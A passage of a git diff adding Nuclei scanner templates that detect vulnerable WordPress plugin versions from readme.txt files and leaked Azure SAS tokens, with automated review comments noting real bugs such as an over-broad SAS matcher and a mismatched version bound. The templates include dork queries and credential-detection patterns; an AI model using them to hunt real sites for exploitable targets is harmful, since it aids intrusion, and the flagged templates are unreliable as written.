+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "armember-membership"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.0.51')
\ No newline at end of file
diff --git a/poc/other/azure-storage-sas-leak.yaml b/poc/other/azure-storage-sas-leak.yaml
new file mode 100644
index 0000000000..d5b351fc2c
--- /dev/null
+++ b/poc/other/azure-storage-sas-leak.yaml
@@ -0,0 +1,71 @@
+id: azure-storage-sas-leak
+
+info:
+ name: Azure Storage Shared Access Signature (SAS) Leak
+ author: 0xSH4RKS
+ severity: high
+ description: |
+ Detects exposed Azure Storage Shared Access Signatures (SAS) in connection strings and URLs within HTTP responses.
+ SAS tokens grant access to Azure Storage resources and should be kept confidential.
+ tags: azure, storage, sas, credential-exposure
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: or
+
+ matchers:
+ # Detect Service SAS in connection strings with or without SharedAccessSignature=
+ - type: regex
+ regex:
+ - '(?i)(SharedAccessSignature=)?sv=\d{4}-\d{2}-\d{2}&sr=[bfqt]&si=[\w\-]+&sig=[\w%]+&sp=[rwlmad]+'
+ - '(?i)(SharedAccessSignature=)?sv=\d{4}-\d{2}-\d{2}&sr=[bfqt]&si=[\w\-]+&sig=[\w%]+&sp=[rwlmad]+'
+
+ # Detect Account SAS in connection strings with or without SharedAccessSignature=
+ - type: regex
+ regex:
+ - '(?i)(SharedAccessSignature=)?sv=\d{4}-\d{2}-\d{2}&sig=[\w%]+&spr=https?&st=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&se=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&srt=[sbfqt]&ss=[bfqt]&sp=[rwlmad]+'
+ - '(?i)(SharedAccessSignature=)?sv=\d{4}-\d{2}-\d{2}&sig=[\w%]+&spr=https?&st=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&se=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&srt=[sbfqt]&ss=[bfqt]&sp=[rwlmad]+'
+
+ # Detect SAS tokens in URLs
+ - type: regex
+ regex:
+ - '(?i)sv=\d{4}-\d{2}-\d{2}&sr=[bfqt]&si=[\w\-]+&sig=[\w%]+&sp=[rwlmad]+'
+ - '(?i)sv=\d{4}-\d{2}-\d{2}&sr=[bfqt]&si=[\w\-]+&sig=[\w%]+&sp=[rwlmad]+'
+
+ - type: regex
+ regex:
+ - '(?i)sv=\d{4}-\d{2}-\d{2}&sig=[\w%]+&sp=[rwlmad]+'
+ - '(?i)sv=\d{4}-\d{2}-\d{2}&sig=[\w%]+&sp=[rwlmad]+'
+
+ - type: regex
+ regex:
+ - '(?i)sv=\d{4}-\d{2}-\d{2}&spr=https?&st=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&se=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&srt=[sbfqt]&ss=[bfqt]&sp=[rwlmad]+'
+ - '(?i)sv=\d{4}-\d{2}-\d{2}&spr=https?&st=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&se=\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z&srt=[sbfqt]&ss=[bfqt]&sp=[rwlmad]+'
+
+ # Detect SAS tokens in URLs with any parameters
+ - type: regex
+ regex:
+ - '(?i)sv=\d{4}-\d{2}-\d{2}[^&\s]*&sig=[\w%]+[^&\s]*&sp=[rwlmad]+'
+ - '(?i)sv=\d{4}-\d{2}-\d{2}[^&\s]*&sig=[\w%]+[^&\s]*&sp=[rwlmad]+'
+
+ # Detect explicit storage endpoints with SAS tokens in URLs
+ - type: regex
+ regex:
+ - '(?i)https?://[a-zA-Z0-9.\-]+\.blob\.core\.windows\.net/[a-zA-Z0-9\-]+/[a-zA-Z0-9\-]+\.txt\?sv=\d{4}-\d{2}-\d{2}&sr=[bfqt]&sig=[\w%]+&sp=[rwlmad]+'
+ - '(?i)https?://[a-zA-Z0-9.\-]+\.blob\.core\.windows\.net/[a-zA-Z0-9\-]+/[a-zA-Z0-9\-]+\.txt\?sv=\d{4}-\d{2}-\d{2}&sr=[bfqt]&sig=[\w%]+&sp=[rwlmad]+'
+
+ - type: regex
+ regex:
+ - '(?i)https?://[a-zA-Z0-9.\-]+\.blob\.core\.windows\.net/[a-zA-Z0-9\-]+/[a-zA-Z0-9\-]+\.txt\?sv=\d{4}-\d{2}-\d{2}.*sig=[\w%]+.*sp=[rwlmad]+'
+ - '(?i)https?://[a-zA-Z0-9.\-]+\.blob\.core\.windows\.net/[a-zA-Z0-9\-]+/[a-zA-Z0-9\-]+\.txt\?sv=\d{4}-\d{2}-\d{2}.*sig=[\w%]+.*sp=[rwlmad]+'
+
+ # General word matchers to ensure the presence of key parameters
+ - type: word
+ words:
+ - "sv="
+ - "sig="
+ - "sp="
+ condition: and
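Review bot: With `matchers-condition: or`, the last `word` matcher (`sv=`, `sig=`, `sp=` with `condition: and`) decides the outcome on its own: any response containing those three short substrings anywhere is reported as a high-severity SAS leak, regardless of the regexes above it. I would delete that matcher, or keep it only as a pre-filter by moving to `matchers-condition: and` with the regexes merged into a single `regex` matcher. Every `regex` list also repeats its pattern twice, which adds nothing, and no matcher sets `part`, so `part: body` is worth stating explicitly. Separately, the two blob-endpoint patterns only accept object names ending in `.txt`, which is narrower than the comment above them suggests.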
diff --git a/poc/other/build-app-online-9dd1526748a52141c3bb31208d05fbb4.yaml b/poc/other/build-app-online-9dd1526748a52141c3bb31208d05fbb4.yaml
new file mode 100644
index 0000000000..2bd65b7ac3
--- /dev/null
+++ b/poc/other/build-app-online-9dd1526748a52141c3bb31208d05fbb4.yaml
@@ -0,0 +1,59 @@
+id: build-app-online-9dd1526748a52141c3bb31208d05fbb4
+
+info:
+ name: >
+ Build App Online <= 1.0.22 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a68e014-69df-4498-9cc2-618d966e5ed6?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/build-app-online/"
+ google-query: inurl:"/wp-content/plugins/build-app-online/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,build-app-online,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/build-app-online/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "build-app-online"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.22')
\ No newline at end of file
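Review bot: `redirects: true` lets the readme request follow up to three redirects to any host, so a site that redirects unknown paths elsewhere can have another server's readme.txt matched and reported against the scanned target. Restricting this to the same host, `host-redirects: true` in place of `redirects: true`, keeps the finding attributable to `{{BaseURL}}`. The other readme-based templates in this commit use the same two lines.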
diff --git a/poc/other/cf7-message-filter-c1a17d8e31627d5c93bdc282adcf65c6.yaml b/poc/other/cf7-message-filter-c1a17d8e31627d5c93bdc282adcf65c6.yaml
new file mode 100644
index 0000000000..b84930aba9
--- /dev/null
+++ b/poc/other/cf7-message-filter-c1a17d8e31627d5c93bdc282adcf65c6.yaml
@@ -0,0 +1,59 @@
+id: cf7-message-filter-c1a17d8e31627d5c93bdc282adcf65c6
+
+info:
+ name: >
+ Message Filter for Contact Form 7 <= 1.6.3 - Missing Authorization to Authenticated (Subscriber+) Filter Updates/Deletions
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5754d2eb-dd31-4056-8a02-8b71b78f774b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cf7-message-filter/"
+ google-query: inurl:"/wp-content/plugins/cf7-message-filter/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cf7-message-filter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cf7-message-filter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cf7-message-filter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.3')
\ No newline at end of file
diff --git a/poc/other/clickbank-storefront-8afd882eedd0c6f2566c03372054a9da.yaml b/poc/other/clickbank-storefront-8afd882eedd0c6f2566c03372054a9da.yaml
new file mode 100644
index 0000000000..7365290f37
--- /dev/null
+++ b/poc/other/clickbank-storefront-8afd882eedd0c6f2566c03372054a9da.yaml
@@ -0,0 +1,59 @@
+id: clickbank-storefront-8afd882eedd0c6f2566c03372054a9da
+
+info:
+ name: >
+ Clickbank WordPress Plugin (Storefront) <= 1.7 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/57789905-1e08-41c5-bfda-b1d6d33de4c0?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/clickbank-storefront/"
+ google-query: inurl:"/wp-content/plugins/clickbank-storefront/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,clickbank-storefront,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clickbank-storefront/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clickbank-storefront"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7')
\ No newline at end of file
diff --git a/poc/other/cosmosfarm-share-buttons-ecfd254ef292ce73504cf2aba9045a31.yaml b/poc/other/cosmosfarm-share-buttons-ecfd254ef292ce73504cf2aba9045a31.yaml
new file mode 100644
index 0000000000..10c4c8e1a1
--- /dev/null
+++ b/poc/other/cosmosfarm-share-buttons-ecfd254ef292ce73504cf2aba9045a31.yaml
@@ -0,0 +1,59 @@
+id: cosmosfarm-share-buttons-ecfd254ef292ce73504cf2aba9045a31
+
+info:
+ name: >
+ 소셜 공유 버튼 By 코스모스팜 <= 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4540b21-ef63-4cd2-b605-c66a7b76934f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cosmosfarm-share-buttons/"
+ google-query: inurl:"/wp-content/plugins/cosmosfarm-share-buttons/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cosmosfarm-share-buttons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cosmosfarm-share-buttons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cosmosfarm-share-buttons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9')
\ No newline at end of file
diff --git a/poc/other/cowidgets-elementor-addons-b5f3c81a63289463e2ed249c024ac15f.yaml b/poc/other/cowidgets-elementor-addons-b5f3c81a63289463e2ed249c024ac15f.yaml
new file mode 100644
index 0000000000..e918e0fad8
--- /dev/null
+++ b/poc/other/cowidgets-elementor-addons-b5f3c81a63289463e2ed249c024ac15f.yaml
@@ -0,0 +1,59 @@
+id: cowidgets-elementor-addons-b5f3c81a63289463e2ed249c024ac15f
+
+info:
+ name: >
+ Cowidgets – Elementor Addons <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a29ebdcb-3b03-4504-b553-6f7633c68f3f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cowidgets-elementor-addons/"
+ google-query: inurl:"/wp-content/plugins/cowidgets-elementor-addons/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cowidgets-elementor-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cowidgets-elementor-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cowidgets-elementor-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.0')
\ No newline at end of file
diff --git a/poc/other/cpt-to-map-store-4d44e2fa98e9402abb36eca1074de857.yaml b/poc/other/cpt-to-map-store-4d44e2fa98e9402abb36eca1074de857.yaml
new file mode 100644
index 0000000000..2cff0b11b6
--- /dev/null
+++ b/poc/other/cpt-to-map-store-4d44e2fa98e9402abb36eca1074de857.yaml
@@ -0,0 +1,59 @@
+id: cpt-to-map-store-4d44e2fa98e9402abb36eca1074de857
+
+info:
+ name: >
+ Custom Post Type to Map Store <= 1.1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ea5c0b48-7e8e-492e-b0de-14681e31fe85?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cpt-to-map-store/"
+ google-query: inurl:"/wp-content/plugins/cpt-to-map-store/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cpt-to-map-store,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cpt-to-map-store/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cpt-to-map-store"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.0')
\ No newline at end of file
diff --git a/poc/other/dancepress-trwa-731e3e5e4597e7faa251c93c238e74cd.yaml b/poc/other/dancepress-trwa-731e3e5e4597e7faa251c93c238e74cd.yaml
new file mode 100644
index 0000000000..1ccfc6db8d
--- /dev/null
+++ b/poc/other/dancepress-trwa-731e3e5e4597e7faa251c93c238e74cd.yaml
@@ -0,0 +1,59 @@
+id: dancepress-trwa-731e3e5e4597e7faa251c93c238e74cd
+
+info:
+ name: >
+ DancePress (TRWA) <= 3.1.11 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c2bddb3-2b23-4a75-abe2-db787441a1b2?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/dancepress-trwa/"
+ google-query: inurl:"/wp-content/plugins/dancepress-trwa/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,dancepress-trwa,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/dancepress-trwa/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "dancepress-trwa"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.11')
\ No newline at end of file
diff --git a/poc/other/depicter-91350bdff3ee5a46d0032f5a28a6265e.yaml b/poc/other/depicter-91350bdff3ee5a46d0032f5a28a6265e.yaml
new file mode 100644
index 0000000000..ba6154be02
--- /dev/null
+++ b/poc/other/depicter-91350bdff3ee5a46d0032f5a28a6265e.yaml
@@ -0,0 +1,59 @@
+id: depicter-91350bdff3ee5a46d0032f5a28a6265e
+
+info:
+ name: >
+ Slider & Popup Builder by Depicter – Add Image Slider, Carousel Slider, Exit Intent Popup, Popup Modal, Coupon Popup, Post Slider Carousel <= 3.2.1- Authenticated (Author+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/965cacd3-1786-4e7d-8209-eea293b161d3?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/depicter/"
+ google-query: inurl:"/wp-content/plugins/depicter/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,depicter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/depicter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "depicter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.1')
\ No newline at end of file
diff --git a/poc/other/devnex-addons-for-elementor-9a3e30634b4dc7fbfd732639244dc3ab.yaml b/poc/other/devnex-addons-for-elementor-9a3e30634b4dc7fbfd732639244dc3ab.yaml
new file mode 100644
index 0000000000..a7f0cee1aa
--- /dev/null
+++ b/poc/other/devnex-addons-for-elementor-9a3e30634b4dc7fbfd732639244dc3ab.yaml
@@ -0,0 +1,59 @@
+id: devnex-addons-for-elementor-9a3e30634b4dc7fbfd732639244dc3ab
+
+info:
+ name: >
+ Devnex Addons For Elementor <= 1.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c179cb56-6d18-4e04-8539-3834a286e302?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/devnex-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/devnex-addons-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,devnex-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/devnex-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "devnex-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.8')
\ No newline at end of file
diff --git a/poc/other/donate-me-574b61de3d2f5e0e6650c80193c07c44.yaml b/poc/other/donate-me-574b61de3d2f5e0e6650c80193c07c44.yaml
new file mode 100644
index 0000000000..e91aafffd0
--- /dev/null
+++ b/poc/other/donate-me-574b61de3d2f5e0e6650c80193c07c44.yaml
@@ -0,0 +1,59 @@
+id: donate-me-574b61de3d2f5e0e6650c80193c07c44
+
+info:
+ name: >
+ Donate Me <= 1.2.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7df1901f-fb18-4d1b-ac80-38b676efb64f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/donate-me/"
+ google-query: inurl:"/wp-content/plugins/donate-me/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,donate-me,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/donate-me/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "donate-me"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.5')
\ No newline at end of file
diff --git a/poc/other/essential-breadcrumbs-2267a02f90f738f304f189dd1027700a.yaml b/poc/other/essential-breadcrumbs-2267a02f90f738f304f189dd1027700a.yaml
new file mode 100644
index 0000000000..2ffb4c1197
--- /dev/null
+++ b/poc/other/essential-breadcrumbs-2267a02f90f738f304f189dd1027700a.yaml
@@ -0,0 +1,59 @@
+id: essential-breadcrumbs-2267a02f90f738f304f189dd1027700a
+
+info:
+ name: >
+ Essential Breadcrumbs <= 1.1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d4838b8-7a9d-43b7-a577-7d7ae8bac5fa?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/essential-breadcrumbs/"
+ google-query: inurl:"/wp-content/plugins/essential-breadcrumbs/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,essential-breadcrumbs,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/essential-breadcrumbs/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "essential-breadcrumbs"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file
diff --git a/poc/other/event-tickets-with-ticket-scanner-e282372c4562ecaf77b223ee7da1e18e.yaml b/poc/other/event-tickets-with-ticket-scanner-e282372c4562ecaf77b223ee7da1e18e.yaml
new file mode 100644
index 0000000000..f488924f4d
--- /dev/null
+++ b/poc/other/event-tickets-with-ticket-scanner-e282372c4562ecaf77b223ee7da1e18e.yaml
@@ -0,0 +1,59 @@
+id: event-tickets-with-ticket-scanner-e282372c4562ecaf77b223ee7da1e18e
+
+info:
+ name: >
+ Event Tickets with Ticket Scanner <= 2.4.4 - Missing Authorization to Authenticated (Subscriber+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4dcf1133-d437-4f0a-b2cf-c91e0f6b6ca9?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/event-tickets-with-ticket-scanner/"
+ google-query: inurl:"/wp-content/plugins/event-tickets-with-ticket-scanner/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,event-tickets-with-ticket-scanner,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/event-tickets-with-ticket-scanner/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "event-tickets-with-ticket-scanner"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.3')
\ No newline at end of file
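Review bot: The version bound in the matcher disagrees with the title: `name` says `<= 2.4.4`, but the last DSL line is `compare_versions(version, '<= 2.4.3')`, so an install reporting 2.4.4 would not be flagged. Check the bound against the referenced Wordfence advisory. If 2.4.4 is affected the line should read `- compare_versions(version, '<= 2.4.4')`; otherwise the title needs correcting.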
diff --git a/poc/other/fastbook-responsive-appointment-booking-and-scheduling-system-32675851747f22022fefedfa5bef2428.yaml b/poc/other/fastbook-responsive-appointment-booking-and-scheduling-system-32675851747f22022fefedfa5bef2428.yaml
new file mode 100644
index 0000000000..8ae777a492
--- /dev/null
+++ b/poc/other/fastbook-responsive-appointment-booking-and-scheduling-system-32675851747f22022fefedfa5bef2428.yaml
@@ -0,0 +1,59 @@
+id: fastbook-responsive-appointment-booking-and-scheduling-system-32675851747f22022fefedfa5bef2428
+
+info:
+ name: >
+ FastBook – Responsive Appointment Booking and Scheduling System <= 1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c5fd2255-7f02-4de8-b904-a753580123b9?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/fastbook-responsive-appointment-booking-and-scheduling-system/"
+ google-query: inurl:"/wp-content/plugins/fastbook-responsive-appointment-booking-and-scheduling-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,fastbook-responsive-appointment-booking-and-scheduling-system,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fastbook-responsive-appointment-booking-and-scheduling-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fastbook-responsive-appointment-booking-and-scheduling-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/other/fd-elementor-button-plus-3ed7fab53de695a4fcfb576680a10315.yaml b/poc/other/fd-elementor-button-plus-3ed7fab53de695a4fcfb576680a10315.yaml
new file mode 100644
index 0000000000..0e008bd0e5
--- /dev/null
